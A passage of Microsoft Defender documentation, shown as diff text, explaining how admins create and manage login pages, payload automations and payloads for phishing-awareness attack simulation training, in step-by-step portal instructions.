--- :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** is available only in custom login pages on the **Tenant login pages** tab.-- :::image type="icon" source="../../medi). If the login page is already the default, :::image type="icon" source="../../media/m365-cc-sc-set-as-default-icon.png" border="false"::: **Mark as default** isn't available.-- **Preview** tab: View the login page as users see it. **Page 1** and **Page 2** links are available at the bottom of the page for two-page login pages.-- **Details** tab: View details about the login page:
- - **Description**
- - **Status**: **Ready** or **Draft**.
- - **Login page source**: For built-in login pages, the value is **Global**. For custom login pages, the value is **Tenant**.
- - **Modified by**
- - **Language**
- - **Last modified**
-
-> [!TIP]
-> To see details about other login pages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Create login pages
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Login pages**. To go directly to the **Content library** tab where you can select **Login pages**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-2. On the **Tenant login pages** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create new** to start the new login page wizard.
-
- > [!NOTE]
- > At any point after you name the login page during the new login page wizard, you can select **Save and close** to save your progress and continue later. The incomplete login page has the **Status** value **Draft**. You can pick up where you left off by selecting the login page from the list and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
- >
- > You can also create login pages during the creation of simulations or simulation automations. For more information, see [Create a simulation: Select a payload and login page](attack-simulation-training-simulations.md#select-a-payload-and-login-page) and [Create a simulation automation: Select payloads and login pages](attack-simulation-training-simulation-automations.md#select-payloads-and-login-pages).
-
-3. On the **Define details for login page** page, configure the following settings:
- - **Name**: Enter a unique name.
- - **Description**: Enter an optional description.
-
- When you're finished on the **Define details for login page** page, select **Next**.
-
-4. On the **Configure login page** page, configure the following settings:
-
- - **Select a language**: The available values are: **Chinese (Simplified)**, **Chinese (Traditional)**, **English**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Spanish**, **Dutch**, and **Other**.
-
- - **Make this the default login page**: If you select this option, the login page is the default selection in **Credential Harvest** or **Link in Attachment** [payloads](attack-simulation-training-payloads.md) or [payload automations](attack-simulation-training-payload-automations.md).
-
- - **Create a two-page login**: If you don't select this option, the login page is one page. If you select this option, **Page 1** and **Page 2** tabs appear for you to configure separately.
-
- - Login page content area: Two tabs are available:
- - **Text** tab: A rich text editor is available to create the login page. To see the typical font and formatting settings, toggle **Formatting controls** to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-
- The following controls are also available on the **Text** tab:
-
- - **Dynamic tag**: Select from the following tags:
-
- |Tag name|Tag value|
- |||
- |**Insert User name**|`${userName}`|
- |**Insert First name**|`${firstName}`|
- |**Insert Last name**|`${lastName}`|
- |**Insert UPN**|`${upn}`|
- |**Insert Email**|`${emailAddress}`|
- |**Insert Department**|`${department}`|
- |**Insert Manager**|`${manager}`|
- |**Insert Mobile phone**|`${mobilePhone}`|
- |**Insert City**|`${city}`|
- |**Insert Date**|`${date|MM/dd/yyyy|offset}`|
-
- - **Use from default**: Select an available template to start with. You can modify the text and layout in the editing area. To reset the login page back to the default text and layout of the template, select **Reset to default**.
-
- - **Add compromise button**: Available on one-page logins or on **Page 2** of two-page logins. Select this link to add the compromise button to the login page. The default text on the button is **Submit**, but you can change it.
-
- - **Add Next button**: Available only on **Page 1** of two-page logins. Select this link to add the 'Next' button to the login page. The default text on the button is **Next**, but you can change it.
-
- - **Code** tab: You can view and modify the HTML code directly.
-
- You can preview the results by clicking the **Preview email** button at the top of the page.
-
- When you're finished on the **Review login page** page, select **Next**.
-
-5. On the **Review login page** page, you can review the details of your login page.
-
- You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review login page** page, select **Submit**.
-
-6. On the **New login page \<Name\> created** page, you can use the links to create a new login page, launch a simulation, or view all login pages.
-
- When you're finished on the **New login page \<Name\> created** page, select **Done**.
-
-7. Back on the **Tenant login pages** tab in **Login pages**, the login page that you created is now listed.
-
-## Modify login pages
-
-You can't modify built-in login pages on the **Global login pages** tab. You can only modify custom login pages on the **Tenant login pages** tab.
-
-To modify an existing custom login page on the **Tenant login pages** tab, do one of the following steps:
--- Select the login page from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the login page, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.-- Select the login page from the list by clicking anywhere in the row other than the check box next to the name. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.-
-The login page wizard opens with the settings and values of the selected login page. The steps are the same as described in the [Create login pages](#create-login-pages) section.
-
-## Copy login pages
-
-To copy an existing login page on the **Tenant login pages** or **Global login pages** tabs, do one of the following steps:
--- Select the login page from the list by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the login page, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy**.-
-The login page wizard opens with the settings and values of the selected login page. The steps are the same as described in the [Create login pages](#create-login-pages) section.
-
-> [!NOTE]
-> When you copy a built-in login page on the **Global login pages** tab, be sure to change the **Name** value. This step ensures the copy is saved as a custom login page on the **Tenant login pages** tab.
->
-> The **Use from default** control on the **Configure login page** page in the login page wizard allows you to copy the contents of a built-in login page.
->
-> When you're creating or editing a login page, the **Use from default** control on the **Text** tab of the **Configure login page** step in the login page wizard also allows you to copy the contents of a built-in notification.
-
-## Remove login pages
-
-You can't remove built-in login pages from the **Global login pages** tab. You can only remove custom login pages from the **Tenant login pages** tab.
-
-To remove an existing custom login page from the **Tenant login pages** tab, do one of the following steps:
--- Select the login page from the list by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.-- Select **Γï«** (**Actions**) next to the **Name** value of the login page, and then select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete**.-
-## Make a login page the default
-
-The default login page is the default selection that's used in **Credential Harvest** or **Link in Attachment** [payloads](attack-simulation-training-payloads.md) or [payload automations](attack-simulation-training-payload-automations.md).
-
-To make a login page the default on the **Tenant login pages** or **Global login pages** tabs, do one of the following steps:
--- Select **Γï«** (**Actions**) next to the **Name** value of the login page, and then select :::image type="icon" source="../../media/m365-cc-sc-set-as-default-icon.png" border="false"::: **Mark as default**.-- Select the login page from the list by clicking anywhere in the row other than the check box next to the name. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-set-as-default-icon.png" border="false"::: **Mark as default**.-- Select **Make this the default login page** on the **Configure login page** page in the wizard when you [create or modify a login page](#create-login-pages).-
-> [!NOTE]
-> The previous procedures aren't available if the login page is already the default.
->
-> The default login page is also marked in the list, although you might need to widen the **Name** column to see it:
->
-> :::image type="content" source="../../media/attack-sim-training-login-pages-default.png" alt-text="The default login page marked in the list of login pages in Attack simulation training." lightbox="../../media/attack-sim-training-login-pages-default.png":::
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Create a phishing attack simulation](attack-simulation-training-simulations.md)
-
-[Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md)
security Attack Simulation Training Payload Automations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-payload-automations.md
- Title: Payload automations for Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to use payload automations (payload harvesting) to collect and launch automated simulations for Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/14/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Payload automations for Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, payload automations (also known as _payload harvesting_) collect information from real-world phishing attacks that were reported by users in your organization. You can specify the conditions to look for in phishing attacks (for example, recipients, social engineering technique, or sender information). Attack simulation training then mimics the messages and payloads used in the attack to automatically launch harmless simulations to targeted users.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see any existing payload automations that you created, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Automations** tab \> and then select **Payload automations**. To go directly to the **Automations** tab where you can select **Payload automations**, use <https://security.microsoft.com/attacksimulator?viewid=automations>.
-
-The following information is shown for each payload automation. You can sort the payload automations by clicking on an available column header.
--- **Automation name**-- **Type**: The value is **Payload**.-- **Items collected**-- **Last modified**-- **Status**: The value is **Ready** or **Draft**.-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-## Create payload automations
-
-To create a payload automation, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com/>, go to **Email & collaboration** \> **Attack simulation training** \> **Automations** tab \> **Payload automations**. To go directly to the **Automations** tab where you can select **Payload automations**, use <https://security.microsoft.com/attacksimulator?viewid=automations>.
-
-2. On the **Payload automations** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create automation** to start the new payload automation wizard.
-
- :::image type="content" source="../../media/attack-sim-training-sim-automations-create.png" alt-text="The Create simulation button on the Payload automations tab in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-sim-automations-create.png":::
-
- > [!NOTE]
- > At any point after you name the payload automation during the new payload automation wizard, you can select **Save and close** to save your progress and continue configuring the payload automation later. The incomplete payload automation has the **Status** value **Draft** in **Payload automations** on the **Automations** tab. You can pick up where you left off by selecting the payload automation and clicking :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit automation**.
- >
- > Currently, payload harvesting isn't enabled in GCC environments due to data gathering restrictions.
-
-3. On the **Automation name** page, configure the following settings:
-
- - **Name**: Enter a unique, descriptive name for the payload automation.
- - **Description**: Enter an optional detailed description for the payload automation.
-
- When you're finished on the **Automation name** page, select **Next**.
-
-4. On the **Run conditions** page, select the conditions of the real phishing attack that determines when the automation runs.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add condition** and then select from one of the following conditions:
-
- - **No. of users targeted in the campaign**: In the boxes that appear, configure the following settings:
- - **Equal to**, **Less than**, **Greater than**, **Less than or equal to**, or **Greater than or equal to**.
- - **Enter value**: The number of users that were targeted by the phishing campaign.
- - **Campaigns with a specific phish technique**: In the box that appears, select one of the available values:
- - **Credential Harvest**
- - **Malware Attachment**
- - **Link in Attachment**
- - **Link to Malware**
- - **How-to Guide**
- - **Specific sender domain**: In the box that appears, enter a sender email domain value (for example, contoso.com).
- - **Specific sender name**: In the box that appears, enter a sender name value.
- - **Specific sender email**: In the box that appears, enter a sender email address.
- - **Specific user and group recipients**: In the box that appears, start typing the name or email address of the user or group. When it appears, select it.
-
- You can use each condition only once. Multiple conditions use AND logic (\<Condition1\> and \<Condition2\>).
-
- To add another condition, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add condition**.
-
- To remove a condition after you add it, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false":::.
-
- When you're finished on the **Run conditions** page, select **Next**.
-
-5. On the **Review automation** page, you can review the details of your payload automation.
-
- You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review automation** page, select **Submit**.
-
-6. On the **New automation created** page, you can use the links to turn on the payload automation or go to the **Simulations** page.
-
- When you're finished, select **Done**.
-
-7. Back on **Payload automations** in the **Automations** tab, the payload automation that you created is now listed with the **Status** value **Ready**.
-
-## Turn payload automations on or off
-
-You can turn on or turn off payload automations with the **Status** value **Ready**. You can't turn on or turn off incomplete payload automations with the **Status** value **Draft**.
-
-To turn on a payload automation, select it from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** action that appears, and then select **Confirm** in the dialog.
-
-To turn off a payload automation, select it from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** action that appears, and then select **Confirm** in the dialog.
-
-## Modify payload automations
-
-You can only modify payload automations with the **Status** value **Draft** or that are turned off.
-
-To modify an existing payload automation on the **Payload automations** page, do one of the following steps:
--- Select the payload automation from the list by selecting the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit automation** action that appears.-- Select the payload automation from the list by clicking anywhere in the row except the check box. In the details flyout that opens, on the **General** tab, select **Edit** in the **Name**, **Description**, or **Run conditions** sections.-
-The payload automation wizard opens with the settings and values of the selected payload automation. The steps are the same as described in the [Create payload automations](#create-payload-automations) section.
-
-## Remove payload automations
-
-To remove a payload automation, select the payload automation from the list by clicking the check box. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears, and then select **Confirm** in the dialog.
-
-## View payload automation details
-
-For payload automations with the **Status** value **Ready**, select the payload from the **Payload automations** page by clicking anywhere in the row other than the check box next to the name. The details flyout that opens contains the following information:
--- The payload automation name and the number of items collected.-- **General** tab:
- - **Last modified**
- - **Type**: The value is **Payload**.
- - **Name**, **Description**, and **Run conditions** sections: Select **Edit** to open the payload automation wizard on the related page.
-- **Run history** tab: This tab is available only for payload automations with the **Status** value **Ready**.-
- Shows information about the run history of simulations that used the payload automation.
-
- :::image type="content" source="../../media/attack-sim-training-payload-automations-details-run-history.png" alt-text="The Run history tab in the details flyout of a payload automation." lightbox="../../media/attack-sim-training-payload-automations-details-run-history.png":::
-
-> [!TIP]
-> To see details about other payload automations without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md)
-
-[Gain insights through Attack simulation training](attack-simulation-training-insights.md)
security Attack Simulation Training Payloads https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-payloads.md
- Title: Payloads in Attack simulation training------
- - m365-security
- - tier2
-
-description: Admins can learn how to create and manage payloads for Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/11/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Payloads in Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, a _payload_ is the link or attachment in the simulated phishing email message that's presented to users. Attack simulation training offers a robust built-in payload catalog for the available social engineering techniques. However, you might want to create custom payloads that work better for your organization.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see the available payloads, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Payloads**. Or, to go directly to the **Content library** tab where you can select **Payloads**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-**Payloads** in the **Content library** tab has three tabs:
--- **Global payloads**: Contains the built-in, unmodifiable payloads.-- **Tenant payloads**: Contains the custom payloads that you created.-- **MDO recommendations**: Payloads that are recommended by Defender for Office 365 as having considerable impact when used by attackers. This list is refreshed monthly.-
-The information that's available on the tabs is described in the following list:
--- **MDO recommendations** tab: The following information is shown for each payload:
- - **Payload name**
- - **Compromised rate (%)**
- - **Recommended by**
- - **Recommendation date time**
--- **Global payloads** and **Tenant payloads** tabs: The following information is shown for each payload. You can sort the payloads by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are marked with an asterisk (<sup>\*</sup>):
- - **Payload name**<sup>\*</sup>
- - **Type<sup>\*</sup>**: Currently, this value is always **Social engineering**.
- - **Platform**
- - **Technique**<sup>\*</sup>: One of the available [social engineering techniques](attack-simulation-training-simulations.md#select-a-social-engineering-technique):
- - **Credential Harvest**
- - **Malware Attachment**
- - **Link in Attachment**
- - **Link to Malware**
- - **Drive-by URL**
- - **OAuth Consent Grant**
- - **How-to Guide**
- - **Language**<sup>\*</sup>: If the payload contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Simulations launched**<sup>\*</sup>: The number of launched simulations that use the payload.
- - **Source**
- - **Predicted compromised rate (%)**<sup>\*</sup>: Historical data across Microsoft 365 that predicts the percentage of people who will be compromised by this payload (users compromised / total number of users who receive the payload). For more information, see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).
- - **Created by**<sup>\*</sup>: For built-in payloads, the value is **Microsoft**. For custom payloads, the value is the user principal name (UPN) of the user who created the payload.
- - **Last modified**<sup>\*</sup>
- - **Status**<sup>\*</sup>: Values are:
- - **Ready**
- - **Draft**: Available only on the **Tenant payloads** tab.
- - **Archive**: Archived payloads are visible only when **Show archived payloads** is toggled on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - **Γï«** (**Actions** control)<sup>\*</sup>: Take action on the payload. The available actions depend on the **Status** value of the payload as described in the procedure sections. This control always appears at the end of the payload row.
-
- > [!TIP]
- > To see all columns, you likely need to do one or more of the following steps:
- >
- > - Horizontally scroll in your web browser.
- > - Narrow the width of appropriate columns.
- > - Remove columns from the view.
- > - Zoom out in your web browser.
-
- To find a payload in the list, type part of the payload name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: to filter the payloads by one or of the following values:
-
- - **Technique**: One of the available [social engineering techniques](attack-simulation-training-simulations.md#select-a-social-engineering-technique):
- - **Credential Harvest**
- - **Malware Attachment**
- - **Link in Attachment**
- - **Link to Malware**
- - **Drive-by URL**
- - **OAuth Consent Grant**
- - **How-to Guide**
-
- - **Complexity**: Calculated based on the number of indicators in the payload that indicate a possible attack (spelling errors, urgency, etc.). More indicators are easier to identify as an attack and indicate lower complexity. The available values are: **High**, **Medium**, and **Low**.
-
- - **Language**: The available values are: **English**, **Spanish**, **German**, **Japanese**, **French**, **Portuguese**, **Dutch**, **Italian**, **Swedish**, **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Norwegian Bokmål**, **Polish**, **Russian**, **Finnish**, **Korean**, **Turkish**, **Hungarian**, **Thai**, **Arabic**, **Vietnamese**, **Slovak**, **Greek**, **Indonesian**, **Romanian**, **Slovenian**, **Croatian**, **Catalan**, and **Other**.
-
- - **Add tag(s)**
-
- - **Filter by theme**: The available values are: **Account Activation**, **Account Verification**, **Billing**, **Clean up Mail**, **Document Received**, **Expense**, **Fax**, **Finance Report**, **Incoming Messages**, **Invoice**, **Item Received**, **Login Alert**, **Mail Received**, **Password**, **Payment**, **Payroll**, **Personalized Offer**, **Quarantine**, **Remote Work**, **Review Message**, **Security Update**, **Service Suspended**, **Signature Required**, **Upgrade Mailbox Storage**, **Verify mailbox**, **Voicemail**, and **Other**.
-
- - **Filter by brand**: The available values are: **American Express**, **Capital One**, **DHL**, **DocuSign**, **Dropbox**, **Facebook**, **First American**, **Microsoft**, **Netflix**, **Scotiabank**, **SendGrid**, **Stewart Title**, **Tesco**, **Wells Fargo**, **Syrinx Cloud**, and **Other**.
-
- - **Filter by industry**: The available values are: **Banking**, **Business Services**, **Consumer Services**, **Education**, **Energy**, **Construction**, **Consulting**, **Financial Services**, **Government**, **Hospitality**, **Insurance**, **Legal**, **Courier Services**, **IT**, **Healthcare**, **Manufacturing**, **Retail**, **Telecom**, **Real Estate**, and **Other**.
-
- - **Current event**: The available values are **Yes** or **No**.
-
- - **Controversial**: The available values are **Yes** or **No**.
-
- When you're finished configuring filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-When you select a payload by clicking anywhere in the row other than the check box next to the name, a details flyout appears with the following information:
--- **Overview** tab: View the payload as users see it. Payload properties are also visible:
- - **Payload description**
- - **From name**
- - **From email**
- - **Email subject**
- - **Source**: For built-in payloads, the value is **Global**. For custom payloads, the value is **Tenant**.
- - **Click rate**
- - **Simulations launched**
- - **Theme**
- - **Brand**
- - **Industry**
- - **Controversial**
- - **Predicted compromise rate**
- - **Current event**
- - **Tags**
--- **Simulations launched** tab:
- - **Simulation name**
- - **Click rate**
- - **Compromised rate**
- - **Action**: Clicking the **View details** link takes you to the details of the simulation.
-
-To see payloads that have been archived (the **Status** value is **Archive**), use the **Show archived payloads** toggle on the **Tenant payloads** tab.
-
-## Create payloads
-
-> [!NOTE]
-> Certain trademarks, logos, symbols, insignias and other source identifiers receive heightened protection under local, state and federal statutes and laws. Unauthorized use of such indicators can subject the users to penalties, including criminal fines. Though not an extensive list, this includes the Presidential, Vice Presidential, and Congressional seals, the CIA, the FBI, Social Security, Medicare and Medicaid, the United States Internal Revenue Service, and the Olympics. Beyond these categories of trademarks, use and modification of any third-party trademark carries an inherent amount of risk. Using your own trademarks and logos in a payload would be less risky, particularly where your organization permits the use. If you have any further questions about what is or is not appropriate to use when creating or configuring a payload, you should consult with your legal advisors.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> **Payloads** \> **Tenant payloads** tab. To go directly to the **Content library** tab where you can select **Payloads** and the **Tenant payloads** tab, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
- On the **Tenant payloads** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create a payload** to start the new payload wizard.
-
- :::image type="content" source="../../media/attack-sim-training-payload-create.png" alt-text="Create a payload on the Tenant payloads tab in Payloads in Attack simulation training in the Microsoft Defender portal." lightbox="../../media/attack-sim-training-payload-create.png":::
-
- > [!NOTE]
- > At any point after you name the payload during the new payload wizard, you can select **Save and close** to save your progress and continue later. The incomplete payload has the **Status** value **Draft**. You can pick up where you left off by selecting the payload and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit payload** action that appears.
- >
- > You can also create payloads during the creation of simulations. For more information, see [Create a simulation: Select a payload and login page](attack-simulation-training-simulations.md#select-a-payload-and-login-page).
-
-2. On the **Select type** page, select one of the following values:
- - **Email**
- - **Teams**: Currently, this value is available only in Private Preview. For more information, see [Microsoft Teams in Attack simulation training](attack-simulation-training-teams.md).
-
- When you're finished on the **Select type** page, select **Next**.
-
-3. On the **Select technique** page, the available options are the same as on the **Select technique** page in the new simulation wizard:
- - **Credential Harvest**
- - **Malware Attachment**
- - **Link in Attachment**
- - **Link to Malware**
- - **Drive-by URL**
- - **OAuth Consent Grant**
- - **How-to Guide**
-
- For more information about the different social engineering techniques, see [Simulations](attack-simulation-training-get-started.md#simulations).
-
- When you're finished on the **Select technique** page, select **Next**.
-
-4. On the **Payload name** page, configure the following settings:
-
- - **Name**: Enter a unique, descriptive name for the payload.
- - **Description**: Enter an optional detailed description for the payload.
-
- When you're finished on the **Payload name** page, select **Next**.
-
-5. On the **Configure payload** page, it's time to build your payload. Many of the available settings are determined by the selection you made on the **Select technique** page (for example, links vs. attachments).
-
- - **Sender details** section: Configure the following settings:
- - **From name**
- - **Use first name as display name**: By default, this setting isn't selected.
- - **From email**: If you choose an internal email address for your payload's sender, the payload appears to come from a fellow employee. This sender email address increases a user's susceptibility to the payload, and helps to educate employees on the risk of internal threats.
- - **Email subject**
- - **Add External tag to email**: By default, this setting isn't selected.
-
- - **Attachment details** section (**Malware Attachment**, **Link in Attachment**, or **Link to Malware** techniques only): Configure the following settings:
- - **Name your attachment**: Enter a filename for the attachment.
- - **Select an attachment type**: Select a filetype for the attachment. Available values are **Docx** or **HTML**.
-
- - **Phishing link** or **Link for attachment** sections:
- - The **Phishing link** section is available only in the **Credential Harvest**, **Link in Attachment**, **Drive-by URL**, or **OAuth Consent Grant** techniques.
- - The **Link for attachment** section is available only in the **Link to Malware** technique.
-
- Select **Select URL**. In the details flyout that opens, select one of the available URLs, and then select **Confirm**.
-
- To change the URL, select **Change URL**.
-
- > [!NOTE]
- > The available URLs are listed in [Simulations](attack-simulation-training-get-started.md#simulations).
- >
- > Check the availability of the simulated phishing URL in your supported web browsers before you use the URL in a phishing campaign. For more information, see [Phishing simulation URLs blocked by Google Safe Browsing](attack-simulation-training-faq.md#phishing-simulation-urls-blocked-by-google-safe-browsing).
-
- - **Attachment content** section (**Link in Attachment** technique only).
-
- A rich text editor is available to create the attachment content. To see the typical font and formatting settings, toggle **Formatting controls** to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-
- Select the **Phishing link** box. In the **Name phishing URL** dialog that opens, enter a **Name** value for the URL that you selected in the **Phishing link** section, and then select **Confirm**.
-
- The name value that you entered is added to the attachment content as a link to the phishing URL.
-
- - Common settings for all techniques on the **Configure payload** page:
- - **Add tag(s)**
- - **Theme**: The available values are: **Account Activation**, **Account Verification**, **Billing**, **Clean up Mail**, **Document Received**, **Expense**, **Fax**, **Finance Report**, **Incoming Messages**, **Invoice**, **Item Received**, **Login Alert**, **Mail**, **Password**, **Payment**, **Payroll**, **Personalized Offer**, **Quarantine**, **Remote Work**, **Review Message**, **Security Update**, **Service Suspended**, **Signature Required**, **Upgrade Mailbox Storage**, **Verify mailbox**, **Voicemail**, or **Other**.
- - **Brand**: The available values are: **American Express**, **Capital One**, **DHL**, **DocuSign**, **Dropbox**, **Facebook**, **First American**, **Microsoft**, **Netflix**, **Scotiabank**, **SendGrid**, **Stewart Title**, **Tesco**, **Wells Fargo**, **Syrinx Cloud**, **Other**.
- - **Industry**: The available values are: **Banking**, **Business Services**, **Consumer Services**, **Education**, **Energy**, **Construction**, **Consulting**, **Financial Services**, **Government**, **Hospitality**, **Insurance**, **Legal**, **Courier Services**, **IT**, **Healthcare**, **Manufacturing**, **Retail**, **Telecom**, **Real Estate**, or **Other**.
- - **Current event**: The available values are **Yes** or **No**.
- - **Controversial**: The available values are **Yes** or **No**.
- - **Language** section: Select the language for the payload. The available values are: **English**, **Spanish**, **German**, **Japanese**, **French**, **Portuguese**, **Dutch**, **Italian**, **Swedish**, **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Norwegian Bokmål**, **Polish**, **Russian**, **Finnish**, **Korean**, **Turkish**, **Hungarian**, **Hebrew**, **Thai**, **Arabic**, **Vietnamese**, **Slovak**, **Greek**, **Indonesian**, **Romanian**, **Slovenian**, **Croatian**, **Catalan**, or **Other**.
-
- - **Email message** section:
- - You can select **Import email** and then **Choose file** to import an existing plain text message file. Two tabs are available:
- - **Text** tab: A rich text editor is available to create the payload. To see the typical font and formatting settings, toggle **Formatting controls** to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-
- The following controls are also available on the **Text** tab:
-
- - **Dynamic tag**: Select from the following tags:
-
- |Tag name|Tag value|
- |||
- |**Insert User name**|`${userName}`|
- |**Insert First name**|`${firstName}`|
- |**Insert Last name**|`${lastName}`|
- |**Insert UPN**|`${upn}`|
- |**Insert Email**|`${emailAddress}`|
- |**Insert Department**|`${department}`|
- |**Insert Manager**|`${manager}`|
- |**Insert Mobile phone**|`${mobilePhone}`|
- |**Insert City**|`${city}`|
- |**Insert Date**|`${date|MM/dd/yyyy|offset}`|
-
- - The **Phishing link** or **Malware attachment** control is available:
- - **Phishing link** is available only in the **Credential Harvest**, **Drive-by URL**, or **OAuth Consent Grant** techniques.
- - **Malware attachment link** is available only in the **Link to Malware**.
-
- After you select the control, a **Name phishing URL** dialog opens. Enter a **Name** value for the URL that you selected in the **Phishing link** or **Link for attachment** section, and then select **Confirm**.
-
- The name value that you entered is added to the message body as a link to the phishing URL. On the **Code** tab, the link value is `<a href="${phishingUrl}" target="_blank">Name value you specified</a>`.
-
- - **Code** tab: You can view and modify the HTML code directly.
-
- - **Replace all links in the email message with the phishing link** (**Credential Harvest**, **Link to Malware**, **Drive-by URL**, or **OAuth Consent Grant** techniques only): This toggle can save time by replacing all links in the message with the previously selected **Phishing link** or **Link for attachment** URL. To take this action, toggle the setting to on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-
- - **Predicted compromised rate** section: Select **Predict compromise rate** to calculate the predicted success rate of the payload. For more information, see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).
-
- When you're finished on the **Configure payload** page, select **Next**.
-
- > [!TIP]
- > For the **How-to Guide** technique, you go directly to the **Review payload** page.
-
-6. The **Add indicators** page is available only if you selected **Credential Harvest**, **Link in Attachment**, **Drive-by URL**, or **OAuth Consent Grant** on the **Select technique** page.
-
- Indicators help employees identify the tell-tale signs of phishing messages.
-
- On the **Add indicators** page, select :::image type="icon" source="../../media/m365-cc-sc-add-internal-icon.png" border="false"::: **Add indicator**. In the **Add indicator** flyout that opens, configure the following settings:
-
- - **Select and indicator you would like to use** and **Where do you want to place this indicator on the payload?**:
-
